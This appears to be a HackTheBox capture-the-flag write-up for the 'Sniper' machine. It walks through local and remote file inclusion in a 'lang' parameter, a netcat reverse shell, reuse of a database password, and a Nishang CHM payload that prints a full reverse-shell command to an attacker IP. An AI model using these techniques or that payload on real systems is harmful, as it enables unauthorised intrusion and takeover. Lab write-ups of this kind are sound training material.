HackTheBox Writeup — Sniper
Hello Guys , I am Faisal Husaini. My username on HTB is “kNgF” . Also join me on discord.
The IP of this box is 10.10.10.151
Port Scan
Running masscan on it , we get
masscan -p1-65535,U:1-65535 10.10.10.151 --rate=1000 -e tun0
Running NMAP against the discovered Open Ports
Since we have only 4 ports open , and the interesting one first is the web , so we move to the web part first
Running Gobuster against the web
We see pretty good results , so moving onto the /blog directory
Clicking on the Language drop downs
The paramater “lang” can be potential to LFI , try some entries on it
While trying to access some Windows files like “Windows/system32/drivers/etc/hosts” and “Windows/win.ini” , we get some different results , but due to the web app behaviour , we cannot see it clearly , so we see the source code
We see that we hit the LFI successfully , but trying for RFI now where we create a normal phpinfo() php file and test it
For RFI , we will use samba to share the files so that we can test our RFI
Well here we tried the smbserver tool from Impacket , which unfortunately failed to work for this case , so tried Samba instead for this which we had to install it in our local machine and set it up , first by installing it using “apt-get install samba”
Here is our php script which we will test , also now we set up the samba config file
Now we start the smbd server using the command “service smbd start”
Moving onto the vulnerable URL and test our php file
Here we clearly see that we get RFI successfully , now we move onto getting command execution , for that we create one more simple php file
We can use this for getting command execution , let’s test it
We see that it got accessed successfully , since we didnt provided any parameter , we got no results , let’s test simple “dir” command
We get pretty results , to see the output in good format , we need to check the source code
But its a pain using Windows commands like this , so try to get a reverse shell connection
So I also upload a netcat windows binary into our SMB shares so that we could use it
The above is the final which is used for reverse shell , looking back to the netcat listener
We got reverse shell successfully , now moving further in enumeration
As we were spawned in the webroot directory , we also remember from the Gobuster scan that we had a directory named user , so we moved into that directory here and listed out the files and folders
There is an interesting php file named db.php which might have some creds
We see a dbuser password , which might be password for the user account , so we check the user present on the current machine
We see that we have a user “Chris” on the box , so we use Powershell to switch the user using the below commands
As soon as we enter the last command , we get a new user prompt
We can see that we switched to Chris user successfully , now moving onto the User Flag which is usually located under the Desktop folder of the user
But we see that we cant run any command here except for whoami , maybe due to improper shell , so we try to get another by the same method
Looking back to the another netcat listener
We got a proper reverse shell now , so moving back to getting the User Flag
Moving onto the Priv Esc part
Privilege Escalation
Looking on the main directory
We see a not so common folder Docs, entering it and listing its contents
We see 2 files, one is a txt file and the other is a pdf file and looking the contents of the note.txt file
We see a message for the user Chris, if we look clearly there is a message where the Sniper CEO says to drop a file. Maybe there is a autotask running
So we will create a CHM file using Nishang’s Out-CHM.ps1 powershell script in a Windows VM
Here was the script which we used along with the command at the end
Out-CHM -Payload “C:\Users\Chris\Desktop\nc64.exe -e powershell.exe 10.10.14.165 9003” -HHCPath “C:\Program Files (x86)\HTML Help Workshop”
As soon as we run the script , the CHM file gets created on the current location, i.e, Desktop folder , so we now copy this to our Linux machine and then import into the remote Sniper machine
So here we uploaded the CHM file in the /Docs folder and also before that setup our netcat listener on the other end , as soon as the file gets uploaded and moving onto the listener
We immediately got a reverse shell connection and this time as Administrator and moving futher to get the root flag which is usually stored under the Desktop folder